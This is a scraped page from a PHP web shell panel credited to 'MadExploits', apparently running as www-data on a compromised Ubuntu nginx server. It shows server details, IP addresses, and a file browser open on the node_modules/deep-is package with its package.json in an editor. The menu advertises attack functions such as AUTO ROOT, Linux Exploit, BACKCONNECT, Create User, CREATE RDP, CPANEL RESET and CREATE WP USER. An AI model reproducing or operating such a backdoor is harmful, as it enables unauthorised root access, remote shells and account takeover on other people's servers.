Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
deep-is /
[ HOME SHELL ]
Name
Size
Permission
Action
example
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
.travis.yml
52
B
-rw-rw-rw-
LICENSE
1.21
KB
-rw-rw-rw-
README.markdown
1.41
KB
-rw-rw-rw-
index.js
3.03
KB
-rw-rw-rw-
package.json
953
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "deep-is", "version": "0.1.4", "description": "node's assert.deepEqual algorithm except for NaN being equal to NaN", "main": "index.js", "directories": { "lib": ".", "example": "example", "test": "test" }, "scripts": { "test": "tape test/*.js" }, "devDependencies": { "tape": "~1.0.2" }, "repository": { "type": "git", "url": "http://github.com/thlorenz/deep-is.git" }, "keywords": [ "equality", "equal", "compare" ], "author": { "name": "Thorsten Lorenz", "email": "thlorenz@gmx.de", "url": "http://thlorenz.com" }, "license": "MIT", "testling": { "files": "test/*.js", "browsers": { "ie": [ 6, 7, 8, 9 ], "ff": [ 3.5, 10, 15 ], "chrome": [ 10, 22 ], "safari": [ 5.1 ], "opera": [ 12 ] } } }
Close